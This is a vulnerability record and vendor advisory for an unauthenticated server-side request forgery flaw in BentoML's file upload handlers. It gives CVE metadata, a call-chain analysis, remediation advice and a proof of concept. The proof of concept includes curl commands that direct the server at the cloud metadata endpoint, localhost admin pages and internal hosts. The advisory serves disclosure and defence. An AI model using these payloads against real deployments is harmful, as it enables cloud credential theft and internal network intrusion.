cve-2025-54381

Vulnerability from cvelistv5

Published

2025-07-29 22:11

Modified

2025-07-30 15:07

Severity ?

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L

Summary

BentoML is Vulnerable to an SSRF Attack Through File Upload Processing

References

URL	Tags
security-advisories@github.com	https://github.com/bentoml/BentoML/commit/534c3584621da4ab954bdc3d814cc66b95ae5fb8	Patch
security-advisories@github.com	https://github.com/bentoml/BentoML/security/advisories/GHSA-mrmq-3q62-6cc8	Exploit, Vendor Advisory, Mitigation
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/bentoml/BentoML/security/advisories/GHSA-mrmq-3q62-6cc8	Exploit, Vendor Advisory, Mitigation

Impacted products

▼	Vendor	Product
	bentoml	BentoML

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-54381",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-07-30T13:32:09.733713Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-07-30T15:07:10.836Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-mrmq-3q62-6cc8"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "BentoML",
          "vendor": "bentoml",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.4.0, \u003c 1.4.19"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "BentoML is a Python library for building online serving systems optimized for AI apps and model inference. In versions 1.4.0 until 1.4.19, the file upload processing system contains an SSRF vulnerability that allows unauthenticated remote attackers to force the server to make arbitrary HTTP requests. The vulnerability stems from the multipart form data and JSON request handlers, which automatically download files from user-provided URLs without validating whether those URLs point to internal network addresses, cloud metadata endpoints, or other restricted resources. The documentation explicitly promotes this URL-based file upload feature, making it an intended design that exposes all deployed services to SSRF attacks by default. Version 1.4.19 contains a patch for the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 9.9,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-29T22:11:24.407Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/bentoml/BentoML/security/advisories/GHSA-mrmq-3q62-6cc8",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-mrmq-3q62-6cc8"
        },
        {
          "name": "https://github.com/bentoml/BentoML/commit/534c3584621da4ab954bdc3d814cc66b95ae5fb8",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/bentoml/BentoML/commit/534c3584621da4ab954bdc3d814cc66b95ae5fb8"
        }
      ],
      "source": {
        "advisory": "GHSA-mrmq-3q62-6cc8",
        "discovery": "UNKNOWN"
      },
      "title": "BentoML is Vulnerable to an SSRF Attack Through File Upload Processing"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-54381",
    "datePublished": "2025-07-29T22:11:24.407Z",
    "dateReserved": "2025-07-21T16:12:20.733Z",
    "dateUpdated": "2025-07-30T15:07:10.836Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-54381\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-07-29T23:15:32.947\",\"lastModified\":\"2025-08-05T15:41:26.900\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"BentoML is a Python library for building online serving systems optimized for AI apps and model inference. In versions 1.4.0 until 1.4.19, the file upload processing system contains an SSRF vulnerability that allows unauthenticated remote attackers to force the server to make arbitrary HTTP requests. The vulnerability stems from the multipart form data and JSON request handlers, which automatically download files from user-provided URLs without validating whether those URLs point to internal network addresses, cloud metadata endpoints, or other restricted resources. The documentation explicitly promotes this URL-based file upload feature, making it an intended design that exposes all deployed services to SSRF attacks by default. Version 1.4.19 contains a patch for the issue.\"},{\"lang\":\"es\",\"value\":\"BentoML es una librer\u00eda de Python para crear sistemas de servicios en l\u00ednea optimizados para aplicaciones de IA e inferencia de modelos. En las versiones 1.4.0 a 1.4.19, el sistema de procesamiento de carga de archivos contiene una vulnerabilidad SSRF que permite a atacantes remotos no autenticados forzar al servidor a realizar solicitudes HTTP arbitrarias. La vulnerabilidad se origina en los manejadores de datos de formularios multiparte y solicitudes JSON, que descargan archivos autom\u00e1ticamente desde URL proporcionadas por el usuario sin validar si estas URL apuntan a direcciones de red internas, endpoints de metadatos en la nube u otros recursos restringidos. La documentaci\u00f3n promueve expl\u00edcitamente esta funci\u00f3n de carga de archivos basada en URL, lo que la convierte en un dise\u00f1o que expone todos los servicios implementados a ataques SSRF por defecto. La versi\u00f3n 1.4.19 incluye un parche para este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L\",\"baseScore\":9.9,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":5.3}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:bentoml:bentoml:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"1.4.0\",\"versionEndExcluding\":\"1.4.19\",\"matchCriteriaId\":\"FDC38760-A29D-4F73-A6EE-1AEF5BE60C37\"}]}]}],\"references\":[{\"url\":\"https://github.com/bentoml/BentoML/commit/534c3584621da4ab954bdc3d814cc66b95ae5fb8\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/bentoml/BentoML/security/advisories/GHSA-mrmq-3q62-6cc8\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Mitigation\"]},{\"url\":\"https://github.com/bentoml/BentoML/security/advisories/GHSA-mrmq-3q62-6cc8\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Mitigation\"]}]}}"
  }
}

ghsa-mrmq-3q62-6cc8

Vulnerability from github

Published

2025-07-29 19:24

Modified

2025-07-30 11:43

Severity ?

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L

Summary

BentoML SSRF Vulnerability in File Upload Processing

Details

Description

There's an SSRF in the file upload processing system that allows remote attackers to make arbitrary HTTP requests from the server without authentication. The vulnerability exists in the serialization/deserialization handlers for multipart form data and JSON requests, which automatically download files from user-provided URLs without proper validation of internal network addresses.

The framework automatically registers any service endpoint with file-type parameters (pathlib.Path, PIL.Image.Image) as vulnerable to this attack, making it a framework-wide security issue that affects most real-world ML services handling file uploads. While BentoML implements basic URL scheme validation in the JSONSerde path, the MultipartSerde path has no validation whatsoever, and neither path restricts access to internal networks, cloud metadata endpoints, or localhost services.

The documentation explicitly promotes this URL-based file upload feature, making it an intended but insecure design that exposes all deployed services to SSRF attacks by default.

Source - Sink Analysis

Source: User-controlled multipart form field values and JSON request bodies containing URLs

Call Chain - Path 1 (MultipartSerde - No Validation): 1. HTTP POST request with multipart form data to any BentoML endpoint with file-type input parameters
2. MultipartSerde.parse_request() in src/_bentoml_impl/serde.py:202 processes the request 3. form = await request.form() parses multipart data using Starlette 4. For file-type fields: value = [await self.ensure_file(v) for v in form.getlist(k)] at line 209 5. MultipartSerde.ensure_file() called at lines 186-200 with user-controlled string URL 6. Sink: resp = await client.get(obj) at line 193 - Direct HTTP request with zero validation

Call Chain - Path 2 (JSONSerde - Weak Validation):
1. HTTP POST request with JSON body containing URL to endpoint with IORootModel + multipart_fields 2. JSONSerde.parse_request() in src/_bentoml_impl/serde.py:157 processes the request 3. body = await request.body() extracts request body 4. Condition check: if issubclass(cls, IORootModel) and cls.multipart_fields: at line 164 5. Weak validation: if is_http_url(url := body.decode("utf-8", "ignore")): at line 165 (only checks scheme) 6. Sink: resp = await client.get(url) at line 168 - HTTP request after insufficient validation

Proof of Concept

Create a BentoML service: ```python from pathlib import Path import bentoml

@bentoml.service
class ImageProcessor: @bentoml.api def process_image(self, image: Path) -> str: return f"Processed image: {image}" ```

Deploy and exploit: ```bash

Start service (binds to 0.0.0.0:3000 by default)

bentoml serve service.py:ImageProcessor

SSRF Attack 1 - Access AWS metadata

curl -X POST http://target:3000/process_image \ -F 'image=http://169.254.169.254/latest/meta-data/'

SSRF Attack 2 - Internal service enumeration

curl -X POST http://target:3000/process_image \
-F 'image=http://localhost:8080/admin'

SSRF Attack 3 - Internal network scanning

curl -X POST http://target:3000/process_image \ -F 'image=http://10.0.0.1:22' ```

Expected result: Server makes HTTP requests to internal/cloud endpoints, potentially returning sensitive data in error messages or logs.

Impact

Access AWS/GCP/Azure cloud metadata services for credential theft
Enumerate and interact with internal HTTP services and APIs
Bypass firewall restrictions to reach internal network resources
Perform network reconnaissance from the server's perspective
Retrieve sensitive information disclosed in HTTP response data
Potential for internal service exploitation through crafted requests

Remediation

Implement comprehensive URL validation in both serialization paths by adding network restriction checks to prevent access to internal/private network ranges, localhost, and cloud metadata endpoints. The existing is_http_url() function should be enhanced to include allowlist validation rather than just scheme checking.

Show details on source website